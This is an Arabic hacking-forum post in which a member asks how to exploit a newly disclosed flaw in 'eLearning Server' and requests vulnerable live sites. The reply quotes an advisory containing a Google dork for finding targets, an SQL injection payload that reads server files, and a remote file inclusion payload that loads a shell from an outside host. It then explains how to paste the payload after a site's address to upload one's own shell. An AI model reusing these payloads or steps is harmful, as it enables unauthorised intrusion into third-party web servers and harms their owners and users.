عرض مشاركة واحدة
قديم 05-16-2012, 06:33 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
mido868
 
الصورة الرمزية mido868
 

 

 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road

افتراضي رد: كيف استغل هذه الثغره؟ ارجوا المساعده


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة qasim
السلام عليكم ايها الاحبه

لي الشرف ان اكون بينكم وقد تعلمت الكثير في هذه الفتره القصيره من بدايتي

لدي سؤال وارجو من اهل الخبره المساعده

هذا هو الدورك الجديد للثغره الجديده

كيف ممكن استغلها

اريد شرح بالصور واي موقع مصاب بهذه الثغره حتى تعم الفائده للجميع
http://cxsecurity.com/issue/WLB-2012050086


# Exploit Title: eLearning Server Multiple Remote Vulnerabilities
# Google Dork: intitle:"eLearning Server"
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://www.hypermethod.ru/
# Version: 4G
# Tested on: Microsoft Windows

news.php4 "nid" SQL injection:
POC:
/news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20File s\\Hypermethod\\eLearningServer\\index.php'),4,5,6 ,7,8
,9,10,11/*

admin/setup.inc.php Remote file Include
POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt?

حبيبى
الثغرة هذه من نوع SQL وهو يسمى بحقن قواعد البيانات
إذا لم تكن لديك خلفية او معرفة حول هذا النوع ابحث فى اسام المنتدى ستجد قسم خاص ملىء بالشروحات المختصة بهذا القسم
إذا كانت لك خلفية حول هذه الثغرة فإليك شرح الثغرة
الثغرة تطبق على الاصدار الرابع من PHP المواقع المصابة ،،،والدورك هو كود البحث عن هذه المواقع فى محركات البحث ،،،كود الاستغلال الموجود يمكنك من رفع الشيل الخاص بك بسهولة بعد لصقه بعد عنوان الموقع ثم بعدها تضع علامة = وتضع رابط الشيل الخاص بك
وكما هو مكتوب تم اختباره على سيرفر من نوع وندوز
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 

   

رد مع اقتباس